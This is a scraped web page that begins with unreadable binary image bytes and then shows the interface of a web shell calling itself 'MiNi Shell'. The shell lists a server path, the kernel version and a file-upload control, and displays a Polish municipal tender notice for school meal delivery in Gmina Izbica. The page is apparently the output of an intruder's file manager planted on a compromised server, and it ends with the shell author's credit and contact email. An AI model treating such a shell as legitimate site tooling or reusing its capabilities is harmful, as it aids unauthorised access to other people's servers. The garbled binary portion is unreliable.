JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210816/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210816/0015024501-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przygotowanie oraz dostarczanie posiłków dla uczniów Szkół Podstawowych i Przedszkola Samorządowego w Gminie Izbica </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA IZBICA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 950371703</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Gminna 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Izbica-Wieś</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">22-375</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ugizbica@mbnet.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://ugizbica.bip.e-zeto.eu/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przygotowanie oraz dostarczanie posiłków dla uczniów Szkół Podstawowych i Przedszkola Samorządowego w Gminie Izbica </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b5ab05b0-fe8d-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00150245</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001681/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Przygotowanie oraz dostarczanie posiłków dla uczniów Szkół Podstawowych i Przedszkola Samorządowego w Gminie Izbica</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod adresem:<br/>https://miniportal.uzp.gov.pl/, ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal<br/>oraz poczty elektronicznej.<br/>2. Składanie ofert odbywa się przy użyciu miniPortalu: https://miniportal.uzp.gov.pl/ oraz<br/> ePUAPu: https://epuap.gov.pl/wps/portal.<br/>3 .Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego<br/>musi posiadać konto na platformie ePUAP. Wykonawca posiadający wymienione konto ma dostęp<br/>do:<br/>a) formularza do złożenia, zmiany, wycofania oferty lub wniosku;<br/>b) formularza do komunikacji.<br/>4. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów w postaci<br/>elektronicznej opisane zostały w Regulaminie korzystania z miniPortalu oraz w Regulaminie<br/>ePUAP</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca składa ofertę wraz z wymaganymi dokumentami za pośrednictwem Formularza<br/>do złożenia, zmiany, wycofania oferty lub wniosku, dostępnego na ePUAP i udostępnionego<br/>również na miniPortalu na stronie https://miniportal.uzp.gov.pl/. Klucz publiczny niezbędny do<br/>zaszyfrowania oferty przez Wykonawcę jest dostępny na miniPortalu. <br/>2. W formularzu oferty Wykonawca zobowiązany jest podać adres skrzynki ePUAP, na którym<br/>prowadzona będzie korespondencja związana z postępowaniem. <br/>3. Otwarcie ofert następuje poprzez użycie mechanizmu do odszyfrowania ofert dostępnego po<br/>zalogowaniu w zakładce Deszyfrowanie na miniPortalu i następuje poprzez wskazanie pliku do<br/>odszyfrowania. <br/>4. Sposób złożenia oferty, w tym jej zaszyfrowania opisany został w Regulaminie korzystania z<br/>miniPortalu. <br/>5. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów w postaci<br/>elektronicznej opisane zostały w Regulaminie korzystania z miniPortalu oraz w Regulaminie<br/>ePUAP<br/>6. Ofertę składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym w formatach danych<br/>określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o<br/>informatyzacji działalności podmiotów realizujących zadania publiczne (Dz. U. z 2020 r. poz. 346,<br/>568, 695, 1517 i 2320), z zastrzeżeniem formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, z<br/>uwzględnieniem rodzaju przekazywanych danych.<br/>7. W celu złożenia oferty należy zarejestrować (zalogować) się na Platformie i postępować<br/>zgodnie z instrukcjami u dostawcy rozwiązania informatycznego pod adresem: uzp.gov.pl oraz<br/>miniportal.uzp.gov.pl. Sposób złożenia oferty, w tym zaszyfrowania oferty opisany został w<br/>„Instrukcji użytkownika”, dostępnej na stronie: https://miniportal.uzp.gov.pl.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.272.4.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.Przedmiotem zamówienia jest „Przygotowanie oraz dostarczanie posiłków dla uczniów<br/>Szkół Podstawowych i Przedszkola Samorządowego w Gminie Izbica”.<br/>2. Przewidywana liczba obiadów wynosi 147 dziennie we wszystkie dni nauki szkolnej określone<br/>przez Ministra Edukacji Narodowej w kalendarzu roku szkolnego 2021/2022 z uwzględnieniem<br/>przerw w nauce, tj. przyjmuje się 192 dni, razem 28 224 posiłków. <br/>3. Zastrzega się możliwość zwiększenia lub zmniejszenia ilości dostarczanych posiłków.<br/>Ewentualne zmiany ilości Zamawiający będzie zgłaszać Wykonawcy najpóźniej do godziny 9:00<br/>danego dnia. W imieniu Zamawiającego z Wykonawcą kontaktować się będą pracownicy<br/>poszczególnych szkół i przedszkola.<br/>4. Zamawiający zapłaci Wykonawcy wyłącznie za posiłki rzeczywiście wydane, zgodnie z<br/>codziennym zapotrzebowaniem.<br/>5. Dostawa posiłków będzie się odbywać od dnia 01.09.2021r. do dnia 24.06.2022r. (bez<br/>uwzględniania dni rozpoczęcia oraz zakończenia roku szkolnego) od poniedziałku do piątku, z<br/>wyłączeniem dni ustawowo wolnych od nauki. W wyjątkowej sytuacji związanej ze zmianą<br/>organizacji dnia szkoły/przedszkola, dostawa obiadu odbędzie się w inny dzień i o innej godzinie –<br/>po wcześniejszym uzgodnieniu z Wykonawcą.<br/>6. Wykonawca zobowiązany jest do dostarczenia tygodniowego jadłospisu, z co najmniej 3-<br/>dniowym wyprzedzeniem, do akceptacji Zamawiającego. Wykonawca zobowiązany jest do<br/>zachowania jakości obiadów zgodnie z przedstawionym jadłospisem.<br/>7. Wszystkie posiłki powinny być przygotowane zgodnie z obowiązującymi normami i przepisami<br/>prawa. Wykonawca zobowiązany jest do przygotowywania posiłków zgodnie z zasadami<br/>określonymi w ustawie z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia (tj. Dz.U.<br/>2020 poz. 2021 z późn. zm.) łącznie z przepisami wykonawczymi do tej ustawy – Rozporządzenie<br/>Ministra Zdrowia z dnia 26 lipca 2016 r. w sprawie grup środków spożywczych przeznaczonych do<br/>sprzedaży dzieciom i młodzieży w jednostkach systemu oświaty oraz wymagań, jakie muszą<br/>spełniać środki spożywcze stosowane w ramach żywienia zbiorowego dzieci i młodzieży w tych<br/>jednostkach. <br/>8. Bezwzględnie przestrzegać należy norm na składniki pokarmowe i produkty spożywcze<br/>określone przez Instytut Żywności i Żywienia. Obiady muszą być przygotowane zgodnie z<br/>zasadami racjonalnego żywienia dzieci i młodzieży.<br/>9. Posiłki dostarczane będą naprzemiennie tj. zupa z pieczywem, w następnym dniu: danie<br/>mięsne/rybne z ziemniakami/kaszą/ryżem, surówką i napojem/kompotem lub danie<br/>jarkie/półmięsne z napojem/kompotem.<br/>10. Posiłki muszą spełniać następujące warunki jakościowe i ilościowe:<br/>– jadłospis dwudekadowy winien być urozmaicony – rodzaj zupy nie może się powtarzać w<br/>ciągu tygodnia, natomiast rodzaj drugiego dania w dekadzie;<br/>– w ciągu tygodnia co najmniej dwa razy powinien być dostarczany obiad z drugim daniem<br/>mięsnym/rybnym, a jeden raz danie jarskie/półmięsne (wykluczając risotto z mięsem i<br/>bigos);<br/>– potrawy powinny być lekkostrawne, przygotowywane z wysokiej jakości składników –<br/>świeżych, naturalnych, mało przetworzonych, z ograniczoną ilością substancji dodatkowych<br/>– konserwujących, zagęszczających, barwiących lub sztucznie aromatyzowanych;<br/>– w jadłospisie powinny przeważać potrawy gotowane, pieczone i duszone, okazjonalnie<br/>smażone. Mięso powinno być miękkie;<br/>– do przygotowania posiłków zaleca się stosowanie tłuszczów roślinnych (co za tym idzie –<br/>ograniczone stosowanie tłuszczów zwierzęcych), stosowanie dużej ilości warzyw i owoców,<br/>w tym także nasion roślin strączkowych, różnego rodzaju kasz, umiarkowane stosowanie jaj,<br/>cukru i soli;<br/>– zupy winny być sporządzone na wywarze warzywno-mięsnym;<br/>– istotna jest estetyka potraw i posiłków;<br/>– posiłki powinny być przygotowane ze składników wcześniej nieprzetworzonych (świeżego<br/>mięsa, surowych warzyw i owoców). W sezonie zimowym dopuszcza się przygotowanie<br/>posiłków na bazie półproduktów;<br/>– nie dopuszcza się produktów typu instant, gotowych sosów i ziemniaków w proszku typu<br/>puree. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55523100-3 - Usługi w zakresie posiłków szkolnych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55524000-9 - Usługi dostarczania posiłków do szkół</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-09-01 do 2022-06-24</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas dostawy posiłku</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy spełniają określone przez<br/>Zamawiającego warunki udziału w postępowaniu dotyczące:<br/>2.Kompetencji lub uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej, o ile wynika to z odrębnych przepisów.<br/>Zamawiający na potwierdzenie tego warunku wymaga, aby Wykonawca wykazał, że uzyskał decyzję<br/>Państwowego Inspektoratu Sanitarnego zatwierdzającą lub warunkowo zatwierdzającą zakład<br/>wprowadzony do obrotu lub/i produkujący żywność lub/i uzyskał wpis do rejestru zakładów, które<br/>wprowadzają do obrotu lub/i produkują żywność, o którym mowa w art. 61-67 ustawy z dnia 25<br/>sierpnia 2006r. O bezpieczeństwie żywności i żywienia (tj. Dz.U. 2020 poz. 2021 z późn. zm.).<br/>3. Sytuacji ekonomicznej lub finansowej.<br/>Zamawiający odstępuje od precyzowania warunku w przedmiotowym zakresie.<br/>4. Zdolności technicznej lub zawodowej.<br/>Zamawiający uzna ww. warunek za spełniony jeżeli Wykonawca wykaże , że dysponuje lub będzie<br/>dysponował minimum 1 osobą odpowiedzialną za układanie jadłospisów i odpowiadającą za ich<br/>prawidłową realizację – tj. dietetyka. Dietetykiem, Technologiem Żywności, Żywienia lub<br/>Gastronomii ze strony Wykonawcy jest osoba, która ukończyła policealną szkołę średnią i uzyskała<br/>dyplom dietetyka lub osoba, która ukończyła szkołę wyższą na kierunku lub w specjalności dietetyka<br/>realizującą w programie nauczania co najmniej treści kształcenia oraz liczbę godzin objęte<br/>podstawą programową kształcenia w zawodzie dietetyk i uzyskała tytuł licencjata lub magistra.<br/>5. Zdolności do występowania w obrocie gospodarczym.<br/>Zamawiający odstępuje od precyzowania warunku w przedmiotowym zakresie <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość wprowadzenia zmian do zawartej umowy na podstawie art. 454-455 ustawy Pzp oraz postanowień wzoru umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-24 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem strony internetowej na której prowadzone jest postępowanie o udzielenie zamówienia [URL]: https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-24 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-22</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com